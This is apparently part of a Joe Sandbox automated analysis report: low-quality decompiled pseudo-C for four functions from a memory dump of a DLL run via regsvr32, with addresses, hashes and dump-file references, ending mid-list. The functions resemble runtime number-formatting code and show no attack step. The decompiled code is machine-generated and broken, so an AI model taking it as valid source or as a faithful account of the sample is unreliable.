                                                                                                              Function 000000018001EB04 Relevance: .2, Instructions: 154COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 32%
                                                                                                              			E0000000118001EB04(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t86;
				signed int _t95;
				void* _t104;
				intOrPtr _t105;
				signed int _t109;
				intOrPtr _t123;
				void* _t126;
				signed long long _t147;
				signed long long _t148;
				void* _t154;
				void* _t156;

				_t154 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t126 = __rcx;
				r14b = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t104 = _t86 - 5;
				if (_t104 > 0) goto 0x8001ebe3;
				if (_t104 == 0) goto 0x8001eb5d;
				_t105 = _t86;
				if (_t105 == 0) goto 0x8001ec37;
				if (_t105 == 0) goto 0x8001ebb3;
				if (_t105 == 0) goto 0x8001eb84;
				if (_t105 == 0) goto 0x8001ec37;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001ec03;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ec60;
				0x800198c0();
				goto 0x8001ec65;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001eba9;
				E00000001180017260( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001ec65;
				0x80017908();
				goto 0x8001ec65;
				_a8 = _a8 & 0x00000000;
				_t109 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t109 == 0) goto 0x8001ebd9;
				_t72 = E00000001180016978( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001ec65;
				E00000001180016DF0(_t72, __rcx, __rcx,  &_a8, _t154);
				goto 0x8001ec65;
				if (_t109 == 0) goto 0x8001eb5d;
				if (_t109 == 0) goto 0x8001eb5d;
				if (_t109 == 0) goto 0x8001eb5d;
				goto 0x8001eb4b;
				_t123 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t123 + 0x30)) = 1;
				 *((intOrPtr*)(_t123 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001ed15;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001ec59;
				0x80017d78();
				goto 0x8001ec65;
				E000000011800181E4( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t154);
				goto 0x8001ec65;
				0x80019d30();
				if (0 == 0) goto 0x8001ec30;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001ec7f;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001ed13;
				_t147 = _a8;
				if (0 == 0) goto 0x8001ec9d;
				if (_t147 >= 0) goto 0x8001ec9d;
				_t148 =  ~_t147;
				_t95 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t95;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ecac;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001ecc3;
				 *(__rcx + 0x28) = _t95 & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t148,  *((intOrPtr*)(__rcx + 8)));
				if (_t148 != 0) goto 0x8001eccc;
				 *(_t126 + 0x28) =  *(_t126 + 0x28) & 0xffffffdf;
				 *((char*)(_t126 + 0x4c)) = 0;
				r8b = r14b;
				if (_t156 != _t156) goto 0x8001ece5;
				E00000001180022170(_t126, _t148);
				goto 0x8001ecec;
				E00000001180020BB0(__esi, _t126, _t148);
				if (0 == 0) goto 0x8001ed13;
				if ( *((intOrPtr*)(_t126 + 0x48)) == 0) goto 0x8001ed05;
				if ( *((char*)( *((intOrPtr*)(_t126 + 0x40)))) == 0x30) goto 0x8001ed13;
				 *((long long*)(_t126 + 0x40)) =  *((long long*)(_t126 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t126 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t126 + 0x48)) =  *((intOrPtr*)(_t126 + 0x48)) + 1;
				return 1;
			}


















                                                                                                              0x18001eb04
                                                                                                              0x18001eb04
                                                                                                              0x18001eb09
                                                                                                              0x18001eb0e
                                                                                                              0x18001eb1f
                                                                                                              0x18001eb22
                                                                                                              0x18001eb25
                                                                                                              0x18001eb28
                                                                                                              0x18001eb2e
                                                                                                              0x18001eb31
                                                                                                              0x18001eb37
                                                                                                              0x18001eb39
                                                                                                              0x18001eb3b
                                                                                                              0x18001eb44
                                                                                                              0x18001eb49
                                                                                                              0x18001eb4e
                                                                                                              0x18001eb57
                                                                                                              0x18001eb64
                                                                                                              0x18001eb74
                                                                                                              0x18001eb7a
                                                                                                              0x18001eb7f
                                                                                                              0x18001eb8b
                                                                                                              0x18001eb9d
                                                                                                              0x18001eb9f
                                                                                                              0x18001eba4
                                                                                                              0x18001eba9
                                                                                                              0x18001ebae
                                                                                                              0x18001ebba
                                                                                                              0x18001ebca
                                                                                                              0x18001ebcd
                                                                                                              0x18001ebcf
                                                                                                              0x18001ebd4
                                                                                                              0x18001ebd9
                                                                                                              0x18001ebde
                                                                                                              0x18001ebe6
                                                                                                              0x18001ebef
                                                                                                              0x18001ebf8
                                                                                                              0x18001ebfe
                                                                                                              0x18001ec03
                                                                                                              0x18001ec07
                                                                                                              0x18001ec0a
                                                                                                              0x18001ec11
                                                                                                              0x18001ec15
                                                                                                              0x18001ec20
                                                                                                              0x18001ec25
                                                                                                              0x18001ec2b
                                                                                                              0x18001ec32
                                                                                                              0x18001ec3e
                                                                                                              0x18001ec50
                                                                                                              0x18001ec52
                                                                                                              0x18001ec57
                                                                                                              0x18001ec59
                                                                                                              0x18001ec5e
                                                                                                              0x18001ec60
                                                                                                              0x18001ec67
                                                                                                              0x18001ec70
                                                                                                              0x18001ec79
                                                                                                              0x18001ec84
                                                                                                              0x18001ec8d
                                                                                                              0x18001ec92
                                                                                                              0x18001ec94
                                                                                                              0x18001ec97
                                                                                                              0x18001ec9a
                                                                                                              0x18001eca1
                                                                                                              0x18001eca3
                                                                                                              0x18001ecaa
                                                                                                              0x18001ecb7
                                                                                                              0x18001ecbe
                                                                                                              0x18001ecc6
                                                                                                              0x18001ecc8
                                                                                                              0x18001eccc
                                                                                                              0x18001ecd0
                                                                                                              0x18001ecd9
                                                                                                              0x18001ecde
                                                                                                              0x18001ece3
                                                                                                              0x18001ece7
                                                                                                              0x18001ecf4
                                                                                                              0x18001ecfa
                                                                                                              0x18001ed03
                                                                                                              0x18001ed05
                                                                                                              0x18001ed0d
                                                                                                              0x18001ed10
                                                                                                              0x18001ed2d

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 245bd1deb71e1c5b9f288b4803590cea0609b6ca0e8f78be2f2fea896bcdb82f
                                                                                                              • Instruction ID: bda8817688db72ba142e0655b28d4d902425cd5f6d98691470120a052182cc0c
                                                                                                              • Opcode Fuzzy Hash: 245bd1deb71e1c5b9f288b4803590cea0609b6ca0e8f78be2f2fea896bcdb82f
                                                                                                              • Instruction Fuzzy Hash: BB516072114EC886F7A78F28C4543ED27A0E75EBDCF158216FA4A0B799CF25CA4AC744
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001CD00 Relevance: .2, Instructions: 154COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 20%
                                                                                                              			E0000000118001CD00(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed long long _v40;
				void* __rbp;
				void* _t72;
				intOrPtr _t85;
				signed int _t94;
				void* _t103;
				intOrPtr _t104;
				signed int _t108;
				intOrPtr _t122;
				void* _t125;
				signed long long _t146;
				signed long long _t147;
				void* _t153;
				void* _t155;

				_t153 = __r8;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t125 = __rcx;
				r14b = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				r15d = 8;
				_t103 = _t85 - 5;
				if (_t103 > 0) goto 0x8001cddf;
				if (_t103 == 0) goto 0x8001cd59;
				_t104 = _t85;
				if (_t104 == 0) goto 0x8001ce33;
				if (_t104 == 0) goto 0x8001cdaf;
				if (_t104 == 0) goto 0x8001cd80;
				if (_t104 == 0) goto 0x8001ce33;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001cdff;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ce5c;
				0x800197b8();
				goto 0x8001ce61;
				_a8 = _a8 & 0x00000000;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cda5;
				E00000001180017158( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001ce61;
				0x80017800();
				goto 0x8001ce61;
				_a8 = _a8 & 0x00000000;
				_t108 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t108 == 0) goto 0x8001cdd5;
				_t72 = E00000001180016870( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
				goto 0x8001ce61;
				E00000001180016CE8(_t72, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001ce61;
				if (_t108 == 0) goto 0x8001cd59;
				if (_t108 == 0) goto 0x8001cd59;
				if (_t108 == 0) goto 0x8001cd59;
				goto 0x8001cd47;
				_t122 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t122 + 0x30)) = 1;
				 *((intOrPtr*)(_t122 + 0x2c)) = 0x16;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = _v40 & 0x00000000;
				0x80013858();
				goto 0x8001cf11;
				_a8 = _a8 & 0x00000000;
				if (0 == 0) goto 0x8001ce55;
				0x80017c70();
				goto 0x8001ce61;
				E000000011800180E0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8, _t153);
				goto 0x8001ce61;
				0x80019c28();
				if (0 == 0) goto 0x8001ce2c;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 1) goto 0x8001ce7b;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001cf0f;
				_t146 = _a8;
				if (0 == 0) goto 0x8001ce99;
				if (_t146 >= 0) goto 0x8001ce99;
				_t147 =  ~_t146;
				_t94 =  *(__rcx + 0x28) | 0x00000040;
				 *(__rcx + 0x28) = _t94;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001cea8;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001cebf;
				 *(__rcx + 0x28) = _t94 & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001cec8;
				 *(_t125 + 0x28) =  *(_t125 + 0x28) & 0xffffffdf;
				 *((char*)(_t125 + 0x4c)) = 0;
				r8b = r14b;
				if (_t155 != _t155) goto 0x8001cee1;
				0x80021764();
				goto 0x8001cee8;
				E000000011800201E8(__esi, _t125, _t147);
				if (0 == 0) goto 0x8001cf0f;
				if ( *((intOrPtr*)(_t125 + 0x48)) == 0) goto 0x8001cf01;
				if ( *((char*)( *((intOrPtr*)(_t125 + 0x40)))) == 0x30) goto 0x8001cf0f;
				 *((long long*)(_t125 + 0x40)) =  *((long long*)(_t125 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t125 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t125 + 0x48)) =  *((intOrPtr*)(_t125 + 0x48)) + 1;
				return 1;
			}


















                                                                                                              0x18001cd00
                                                                                                              0x18001cd00
                                                                                                              0x18001cd05
                                                                                                              0x18001cd0a
                                                                                                              0x18001cd1b
                                                                                                              0x18001cd1e
                                                                                                              0x18001cd21
                                                                                                              0x18001cd24
                                                                                                              0x18001cd2a
                                                                                                              0x18001cd2d
                                                                                                              0x18001cd33
                                                                                                              0x18001cd35
                                                                                                              0x18001cd37
                                                                                                              0x18001cd40
                                                                                                              0x18001cd45
                                                                                                              0x18001cd4a
                                                                                                              0x18001cd53
                                                                                                              0x18001cd60
                                                                                                              0x18001cd70
                                                                                                              0x18001cd76
                                                                                                              0x18001cd7b
                                                                                                              0x18001cd87
                                                                                                              0x18001cd99
                                                                                                              0x18001cd9b
                                                                                                              0x18001cda0
                                                                                                              0x18001cda5
                                                                                                              0x18001cdaa
                                                                                                              0x18001cdb6
                                                                                                              0x18001cdc6
                                                                                                              0x18001cdc9
                                                                                                              0x18001cdcb
                                                                                                              0x18001cdd0
                                                                                                              0x18001cdd5
                                                                                                              0x18001cdda
                                                                                                              0x18001cde2
                                                                                                              0x18001cdeb
                                                                                                              0x18001cdf4
                                                                                                              0x18001cdfa
                                                                                                              0x18001cdff
                                                                                                              0x18001ce03
                                                                                                              0x18001ce06
                                                                                                              0x18001ce0d
                                                                                                              0x18001ce11
                                                                                                              0x18001ce1c
                                                                                                              0x18001ce21
                                                                                                              0x18001ce27
                                                                                                              0x18001ce2e
                                                                                                              0x18001ce3a
                                                                                                              0x18001ce4c
                                                                                                              0x18001ce4e
                                                                                                              0x18001ce53
                                                                                                              0x18001ce55
                                                                                                              0x18001ce5a
                                                                                                              0x18001ce5c
                                                                                                              0x18001ce63
                                                                                                              0x18001ce6c
                                                                                                              0x18001ce75
                                                                                                              0x18001ce80
                                                                                                              0x18001ce89
                                                                                                              0x18001ce8e
                                                                                                              0x18001ce90
                                                                                                              0x18001ce93
                                                                                                              0x18001ce96
                                                                                                              0x18001ce9d
                                                                                                              0x18001ce9f
                                                                                                              0x18001cea6
                                                                                                              0x18001ceb3
                                                                                                              0x18001ceba
                                                                                                              0x18001cec2
                                                                                                              0x18001cec4
                                                                                                              0x18001cec8
                                                                                                              0x18001cecc
                                                                                                              0x18001ced5
                                                                                                              0x18001ceda
                                                                                                              0x18001cedf
                                                                                                              0x18001cee3
                                                                                                              0x18001cef0
                                                                                                              0x18001cef6
                                                                                                              0x18001ceff
                                                                                                              0x18001cf01
                                                                                                              0x18001cf09
                                                                                                              0x18001cf0c
                                                                                                              0x18001cf29

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6e95f257303535e1e4dbded6f5529ef6c53255517f1a0e7cd0fd1684dc960b6
                                                                                                              • Instruction ID: 55c5b7ba88b8dc09b852bd3de6e72cf6ce554bfc89fd2cbc4cbbab0dc1af6b17
                                                                                                              • Opcode Fuzzy Hash: e6e95f257303535e1e4dbded6f5529ef6c53255517f1a0e7cd0fd1684dc960b6
                                                                                                              • Instruction Fuzzy Hash: 9B516572114A8886F7A79E28C0147EC27A1E74DBDCF158215FA4907699CF35CA4AC74A
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001E134 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001E134(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t85;
				signed int _t89;
				void* _t109;
				intOrPtr _t110;
				signed int _t117;
				intOrPtr _t128;
				void* _t132;
				void* _t141;
				intOrPtr _t147;
				void* _t155;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t132 = __rcx;
				bpl = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				_t109 = _t85 - 5;
				if (_t109 > 0) goto 0x8001e21b;
				if (_t109 == 0) goto 0x8001e184;
				_t110 = _t85;
				if (_t110 == 0) goto 0x8001e26f;
				if (_t110 == 0) goto 0x8001e1f3;
				if (_t110 == 0) goto 0x8001e1cc;
				if (_t110 == 0) goto 0x8001e26f;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001e23b;
				_t89 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t141;
				if ((_t89 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e1b6;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e1b6;
				 *(__rcx + 0x28) = _t89 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e29a;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001e2b1;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e1ed;
				goto 0x8001e19f;
				goto 0x8001e19f;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t117 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t117 == 0) goto 0x8001e215;
				goto 0x8001e19f;
				goto 0x8001e19f;
				if (_t117 == 0) goto 0x8001e184;
				if (_t117 == 0) goto 0x8001e184;
				if (_t117 == 0) goto 0x8001e184;
				goto 0x8001e172;
				_t128 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t128 + 0x30)) = 1;
				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001e30a;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t130 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001e292;
				_t147 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001e19f;
				goto 0x8001e19f;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001e2ba;
				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
				 *((char*)(_t132 + 0x4c)) = 1;
				r8b = bpl;
				if (_t141 != 8) goto 0x8001e2d4;
				0x80021e80();
				goto 0x8001e2db;
				E000000011800208C8( *((intOrPtr*)(_t130 - 8)), _t132, _t147, _t155);
				if (0 == 0) goto 0x8001e308;
				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001e2f9;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001e308;
				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
				return 1;
			}















                                                                                                              0x18001e134
                                                                                                              0x18001e139
                                                                                                              0x18001e13e
                                                                                                              0x18001e148
                                                                                                              0x18001e14b
                                                                                                              0x18001e14e
                                                                                                              0x18001e151
                                                                                                              0x18001e154
                                                                                                              0x18001e15a
                                                                                                              0x18001e15c
                                                                                                              0x18001e15e
                                                                                                              0x18001e167
                                                                                                              0x18001e170
                                                                                                              0x18001e175
                                                                                                              0x18001e17e
                                                                                                              0x18001e184
                                                                                                              0x18001e18c
                                                                                                              0x18001e1a6
                                                                                                              0x18001e1ab
                                                                                                              0x18001e1b3
                                                                                                              0x18001e1ba
                                                                                                              0x18001e1c0
                                                                                                              0x18001e1c7
                                                                                                              0x18001e1d4
                                                                                                              0x18001e1e4
                                                                                                              0x18001e1eb
                                                                                                              0x18001e1f1
                                                                                                              0x18001e1fb
                                                                                                              0x18001e205
                                                                                                              0x18001e20c
                                                                                                              0x18001e213
                                                                                                              0x18001e219
                                                                                                              0x18001e21e
                                                                                                              0x18001e227
                                                                                                              0x18001e230
                                                                                                              0x18001e236
                                                                                                              0x18001e23b
                                                                                                              0x18001e23f
                                                                                                              0x18001e242
                                                                                                              0x18001e249
                                                                                                              0x18001e24d
                                                                                                              0x18001e258
                                                                                                              0x18001e25d
                                                                                                              0x18001e263
                                                                                                              0x18001e26a
                                                                                                              0x18001e277
                                                                                                              0x18001e283
                                                                                                              0x18001e287
                                                                                                              0x18001e289
                                                                                                              0x18001e28d
                                                                                                              0x18001e295
                                                                                                              0x18001e2a5
                                                                                                              0x18001e2ac
                                                                                                              0x18001e2b4
                                                                                                              0x18001e2b6
                                                                                                              0x18001e2ba
                                                                                                              0x18001e2be
                                                                                                              0x18001e2c8
                                                                                                              0x18001e2cd
                                                                                                              0x18001e2d2
                                                                                                              0x18001e2d6
                                                                                                              0x18001e2e3
                                                                                                              0x18001e2ee
                                                                                                              0x18001e2f7
                                                                                                              0x18001e2f9
                                                                                                              0x18001e302
                                                                                                              0x18001e305
                                                                                                              0x18001e31e

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e779f3be169d3dd945fb3933c8cffb04370d240d8e8af6b622fbdd836ac6bbc0
                                                                                                              • Instruction ID: c958815c977cb42798c499574a409b7097a7235658130c2e0406d9aeee723404
                                                                                                              • Opcode Fuzzy Hash: e779f3be169d3dd945fb3933c8cffb04370d240d8e8af6b622fbdd836ac6bbc0
                                                                                                              • Instruction Fuzzy Hash: DC51A673600E9892E7AA8F28C0643AC37A1E35EB98F158216EF45177D9CF31DE85C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001C324 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001C324(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t85;
				signed int _t89;
				void* _t109;
				intOrPtr _t110;
				signed int _t117;
				intOrPtr _t128;
				void* _t132;
				void* _t141;
				intOrPtr _t147;
				void* _t155;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t132 = __rcx;
				bpl = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				_t109 = _t85 - 5;
				if (_t109 > 0) goto 0x8001c40b;
				if (_t109 == 0) goto 0x8001c374;
				_t110 = _t85;
				if (_t110 == 0) goto 0x8001c45f;
				if (_t110 == 0) goto 0x8001c3e3;
				if (_t110 == 0) goto 0x8001c3bc;
				if (_t110 == 0) goto 0x8001c45f;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001c42b;
				_t89 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t141;
				if ((_t89 >> 0x00000004 & 0x00000001) == 0) goto 0x8001c3a6;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001c3a6;
				 *(__rcx + 0x28) = _t89 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001c48a;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001c4a1;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c3dd;
				goto 0x8001c38f;
				goto 0x8001c38f;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t117 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t117 == 0) goto 0x8001c405;
				goto 0x8001c38f;
				goto 0x8001c38f;
				if (_t117 == 0) goto 0x8001c374;
				if (_t117 == 0) goto 0x8001c374;
				if (_t117 == 0) goto 0x8001c374;
				goto 0x8001c362;
				_t128 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t128 + 0x30)) = 1;
				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001c4fa;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (0 == 0) goto 0x8001c482;
				_t147 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001c38f;
				goto 0x8001c38f;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001c4aa;
				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
				 *((char*)(_t132 + 0x4c)) = 1;
				r8b = bpl;
				if (_t141 != 8) goto 0x8001c4c4;
				E00000001180021498(0, _t132, _t147, _t155);
				goto 0x8001c4cb;
				0x8001ff20();
				if (0 == 0) goto 0x8001c4f8;
				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001c4e9;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001c4f8;
				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
				return 1;
			}















                                                                                                              0x18001c324
                                                                                                              0x18001c329
                                                                                                              0x18001c32e
                                                                                                              0x18001c338
                                                                                                              0x18001c33b
                                                                                                              0x18001c33e
                                                                                                              0x18001c341
                                                                                                              0x18001c344
                                                                                                              0x18001c34a
                                                                                                              0x18001c34c
                                                                                                              0x18001c34e
                                                                                                              0x18001c357
                                                                                                              0x18001c360
                                                                                                              0x18001c365
                                                                                                              0x18001c36e
                                                                                                              0x18001c374
                                                                                                              0x18001c37c
                                                                                                              0x18001c396
                                                                                                              0x18001c39b
                                                                                                              0x18001c3a3
                                                                                                              0x18001c3aa
                                                                                                              0x18001c3b0
                                                                                                              0x18001c3b7
                                                                                                              0x18001c3c4
                                                                                                              0x18001c3d4
                                                                                                              0x18001c3db
                                                                                                              0x18001c3e1
                                                                                                              0x18001c3eb
                                                                                                              0x18001c3f5
